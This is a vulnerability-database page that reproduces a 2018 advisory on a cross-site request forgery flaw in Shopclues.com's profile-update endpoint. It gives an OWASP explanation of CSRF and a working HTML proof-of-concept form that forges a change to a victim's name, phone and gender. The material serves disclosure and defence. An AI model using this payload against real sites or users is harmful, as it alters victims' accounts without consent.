Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Shopclues.com Cross Site Request Forgery

🗓️ 24 Jul 2018 00:00:00Reported by Ismail TasdelenType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 44 Views

Cross-Site Request Forgery (CSRF) at SHOPCLUES vulnerabilit

Code
`# Exploit Title: [ Cross-Site Request Forgery (CSRF) at SHOPCLUES ]  
# Date: [ 17.07.2018 ]   
# Exploit Author: [ Ismail Tasdelen ]  
# Vendor Homepage: [ https://www.shopclues.com/ ]  
# Software Type : [ Website ]  
# Software Version : [ N/A ]  
# Vulenrability : [ Cross-Site Request Forgery (CSRF) ]  
# Risk : [ Medium ]  
  
# Description : What is Cross-Site Request Forgery (CSRF) vulnerability ?  
  
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.  
  
Source : https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)  
  
# PoC :  
  
<html>  
<head>  
<title> CSRF PoC - SHOPCLUES.COM - Update Profile Page </title>  
</head>  
<body>  
<form action="https://myaccount.shopclues.com/index.php?dispatch=profiles.update" method="POST">  
<input type="text" name="user_data%5Bfirstname%5D" value="Ismail" /><br />  
<input type="text" name="user_data%5Blastname%5D" value="Tasdelen" /><br />  
<input type="text" name="user_data%5Bphone%5D" value="00905554443322" /><br />  
<input type="text" name="user_data%5Bgender%5D" value="M" /><br />  
<input type='submit' name="dispatch[profiles.update.$_action]" value='Go!' />  
</form>  
</body>  
</html>  
  
# You want to follow my activity ?  
  
https://www.linkedin.com/in/ismailtasdelen  
https://github.com/ismailtasdelen  
https://packetstormsecurity.com/user/ismailtasdelen  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Jul 2018 00:00Current
0.7Low risk
Vulners AI Score0.7
shopcluescross-site request forgerycsrfweb applicationsecurity vulnerabilitysocial engineeringstate-changing requestsowasp
44